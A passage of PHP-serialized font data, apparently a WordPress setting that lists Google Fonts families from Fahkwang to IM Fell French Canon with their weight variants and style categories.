Sans\";s:8:\"variants\";a:8:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Fahkwang\";a:3:{s:5:\"label\";s:8:\"Fahkwang\";s:8:\"variants\";a:12:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Fanwood Text\";a:3:{s:5:\"label\";s:12:\"Fanwood Text\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Farro\";a:3:{s:5:\"label\";s:5:\"Farro\";s:8:\"variants\";a:4:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Farsan\";a:3:{s:5:\"label\";s:6:\"Farsan\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Fascinate\";a:3:{s:5:\"label\";s:9:\"Fascinate\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:16:\"Fascinate Inline\";a:3:{s:5:\"label\";s:16:\"Fascinate Inline\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Faster One\";a:3:{s:5:\"label\";s:10:\"Faster One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Fasthand\";a:3:{s:5:\"label\";s:8:\"Fasthand\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Fauna One\";a:3:{s:5:\"label\";s:9:\"Fauna One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Faustina\";a:3:{s:5:\"label\";s:8:\"Faustina\";s:8:\"variants\";a:8:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Federant\";a:3:{s:5:\"label\";s:8:\"Federant\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Federo\";a:3:{s:5:\"label\";s:6:\"Federo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Felipa\";a:3:{s:5:\"label\";s:6:\"Felipa\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Fenix\";a:3:{s:5:\"label\";s:5:\"Fenix\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Festive\";a:3:{s:5:\"label\";s:7:\"Festive\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:12:\"Finger Paint\";a:3:{s:5:\"label\";s:12:\"Finger Paint\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Fira Code\";a:3:{s:5:\"label\";s:9:\"Fira Code\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:9:\"Fira Mono\";a:3:{s:5:\"label\";s:9:\"Fira Mono\";s:8:\"variants\";a:3:{i:0;s:3:\"500\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:9:\"Fira Sans\";a:3:{s:5:\"label\";s:9:\"Fira Sans\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:19:\"Fira Sans Condensed\";a:3:{s:5:\"label\";s:19:\"Fira Sans Condensed\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:25:\"Fira Sans Extra Condensed\";a:3:{s:5:\"label\";s:25:\"Fira Sans Extra Condensed\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Fjalla One\";a:3:{s:5:\"label\";s:10:\"Fjalla One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Fjord One\";a:3:{s:5:\"label\";s:9:\"Fjord One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Flamenco\";a:3:{s:5:\"label\";s:8:\"Flamenco\";s:8:\"variants\";a:2:{i:0;s:3:\"300\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Flavors\";a:3:{s:5:\"label\";s:7:\"Flavors\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Fondamento\";a:3:{s:5:\"label\";s:10:\"Fondamento\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:16:\"Fontdiner Swanky\";a:3:{s:5:\"label\";s:16:\"Fontdiner Swanky\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Forum\";a:3:{s:5:\"label\";s:5:\"Forum\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Francois One\";a:3:{s:5:\"label\";s:12:\"Francois One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Frank Ruhl Libre\";a:3:{s:5:\"label\";s:16:\"Frank Ruhl Libre\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"700\";i:3;s:3:\"900\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Fraunces\";a:3:{s:5:\"label\";s:8:\"Fraunces\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:12:\"Freckle Face\";a:3:{s:5:\"label\";s:12:\"Freckle Face\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:20:\"Fredericka the Great\";a:3:{s:5:\"label\";s:20:\"Fredericka the Great\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Fredoka One\";a:3:{s:5:\"label\";s:11:\"Fredoka One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Freehand\";a:3:{s:5:\"label\";s:8:\"Freehand\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Fresca\";a:3:{s:5:\"label\";s:6:\"Fresca\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Frijole\";a:3:{s:5:\"label\";s:7:\"Frijole\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Fruktur\";a:3:{s:5:\"label\";s:7:\"Fruktur\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Fugaz One\";a:3:{s:5:\"label\";s:9:\"Fugaz One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Fuggles\";a:3:{s:5:\"label\";s:7:\"Fuggles\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"GFS Didot\";a:3:{s:5:\"label\";s:9:\"GFS Didot\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:15:\"GFS Neohellenic\";a:3:{s:5:\"label\";s:15:\"GFS Neohellenic\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Gabriela\";a:3:{s:5:\"label\";s:8:\"Gabriela\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Gaegu\";a:3:{s:5:\"label\";s:5:\"Gaegu\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Gafata\";a:3:{s:5:\"label\";s:6:\"Gafata\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Galada\";a:3:{s:5:\"label\";s:6:\"Galada\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Galdeano\";a:3:{s:5:\"label\";s:8:\"Galdeano\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Galindo\";a:3:{s:5:\"label\";s:7:\"Galindo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Gamja Flower\";a:3:{s:5:\"label\";s:12:\"Gamja Flower\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Gayathri\";a:3:{s:5:\"label\";s:8:\"Gayathri\";s:8:\"variants\";a:3:{i:0;s:3:\"100\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Gelasio\";a:3:{s:5:\"label\";s:7:\"Gelasio\";s:8:\"variants\";a:8:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:13:\"Gentium Basic\";a:3:{s:5:\"label\";s:13:\"Gentium Basic\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:18:\"Gentium Book Basic\";a:3:{s:5:\"label\";s:18:\"Gentium Book Basic\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:3:\"Geo\";a:3:{s:5:\"label\";s:3:\"Geo\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Geostar\";a:3:{s:5:\"label\";s:7:\"Geostar\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Geostar Fill\";a:3:{s:5:\"label\";s:12:\"Geostar Fill\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Germania One\";a:3:{s:5:\"label\";s:12:\"Germania One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Gidugu\";a:3:{s:5:\"label\";s:6:\"Gidugu\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Gilda Display\";a:3:{s:5:\"label\";s:13:\"Gilda Display\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Girassol\";a:3:{s:5:\"label\";s:8:\"Girassol\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Give You Glory\";a:3:{s:5:\"label\";s:14:\"Give You Glory\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:13:\"Glass Antiqua\";a:3:{s:5:\"label\";s:13:\"Glass Antiqua\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Glegoo\";a:3:{s:5:\"label\";s:6:\"Glegoo\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:17:\"Gloria Hallelujah\";a:3:{s:5:\"label\";s:17:\"Gloria Hallelujah\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:10:\"Goblin One\";a:3:{s:5:\"label\";s:10:\"Goblin One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Gochi Hand\";a:3:{s:5:\"label\";s:10:\"Gochi Hand\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Goldman\";a:3:{s:5:\"label\";s:7:\"Goldman\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Gorditas\";a:3:{s:5:\"label\";s:8:\"Gorditas\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Gothic A1\";a:3:{s:5:\"label\";s:9:\"Gothic A1\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Gotu\";a:3:{s:5:\"label\";s:4:\"Gotu\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:21:\"Goudy Bookletter 1911\";a:3:{s:5:\"label\";s:21:\"Goudy Bookletter 1911\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Graduate\";a:3:{s:5:\"label\";s:8:\"Graduate\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Grand Hotel\";a:3:{s:5:\"label\";s:11:\"Grand Hotel\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:12:\"Grandstander\";a:3:{s:5:\"label\";s:12:\"Grandstander\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Gravitas One\";a:3:{s:5:\"label\";s:12:\"Gravitas One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Great Vibes\";a:3:{s:5:\"label\";s:11:\"Great Vibes\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Grenze\";a:3:{s:5:\"label\";s:6:\"Grenze\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:14:\"Grenze Gotisch\";a:3:{s:5:\"label\";s:14:\"Grenze Gotisch\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Griffy\";a:3:{s:5:\"label\";s:6:\"Griffy\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Gruppo\";a:3:{s:5:\"label\";s:6:\"Gruppo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Gudea\";a:3:{s:5:\"label\";s:5:\"Gudea\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:6:\"italic\";i:2;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Gugi\";a:3:{s:5:\"label\";s:4:\"Gugi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Gupter\";a:3:{s:5:\"label\";s:6:\"Gupter\";s:8:\"variants\";a:3:{i:0;s:3:\"500\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Gurajada\";a:3:{s:5:\"label\";s:8:\"Gurajada\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Habibi\";a:3:{s:5:\"label\";s:6:\"Habibi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:14:\"Hachi Maru Pop\";a:3:{s:5:\"label\";s:14:\"Hachi Maru Pop\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Halant\";a:3:{s:5:\"label\";s:6:\"Halant\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:15:\"Hammersmith One\";a:3:{s:5:\"label\";s:15:\"Hammersmith One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Hanalei\";a:3:{s:5:\"label\";s:7:\"Hanalei\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Hanalei Fill\";a:3:{s:5:\"label\";s:12:\"Hanalei Fill\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Handlee\";a:3:{s:5:\"label\";s:7:\"Handlee\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Hanuman\";a:3:{s:5:\"label\";s:7:\"Hanuman\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:12:\"Happy Monkey\";a:3:{s:5:\"label\";s:12:\"Happy Monkey\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Harmattan\";a:3:{s:5:\"label\";s:9:\"Harmattan\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Headland One\";a:3:{s:5:\"label\";s:12:\"Headland One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Heebo\";a:3:{s:5:\"label\";s:5:\"Heebo\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Henny Penny\";a:3:{s:5:\"label\";s:11:\"Henny Penny\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Hepta Slab\";a:3:{s:5:\"label\";s:10:\"Hepta Slab\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:20:\"Herr Von Muellerhoff\";a:3:{s:5:\"label\";s:20:\"Herr Von Muellerhoff\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Hi Melody\";a:3:{s:5:\"label\";s:9:\"Hi Melody\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:4:\"Hind\";a:3:{s:5:\"label\";s:4:\"Hind\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Hind Guntur\";a:3:{s:5:\"label\";s:11:\"Hind Guntur\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Hind Madurai\";a:3:{s:5:\"label\";s:12:\"Hind Madurai\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Hind Siliguri\";a:3:{s:5:\"label\";s:13:\"Hind Siliguri\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Hind Vadodara\";a:3:{s:5:\"label\";s:13:\"Hind Vadodara\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Holtwood One SC\";a:3:{s:5:\"label\";s:15:\"Holtwood One SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:14:\"Homemade Apple\";a:3:{s:5:\"label\";s:14:\"Homemade Apple\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Homenaje\";a:3:{s:5:\"label\";s:8:\"Homenaje\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"IBM Plex Mono\";a:3:{s:5:\"label\";s:13:\"IBM Plex Mono\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:13:\"IBM Plex Sans\";a:3:{s:5:\"label\";s:13:\"IBM Plex Sans\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:23:\"IBM Plex Sans Condensed\";a:3:{s:5:\"label\";s:23:\"IBM Plex Sans Condensed\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"IBM Plex Serif\";a:3:{s:5:\"label\";s:14:\"IBM Plex Serif\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:15:\"IM Fell DW Pica\";a:3:{s:5:\"label\";s:15:\"IM Fell DW Pica\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:18:\"IM Fell DW Pica SC\";a:3:{s:5:\"label\";s:18:\"IM Fell DW Pica SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:19:\"IM Fell Double Pica\";a:3:{s:5:\"label\";s:19:\"IM Fell Double Pica\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:22:\"IM Fell Double Pica SC\";a:3:{s:5:\"label\";s:22:\"IM Fell Double Pica SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:15:\"IM Fell English\";a:3:{s:5:\"label\";s:15:\"IM Fell English\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:18:\"IM Fell English SC\";a:3:{s:5:\"label\";s:18:\"IM Fell English SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:20:\"IM Fell French Canon\";a:3:{s:5:\"label\";s:20:\"IM Fell French 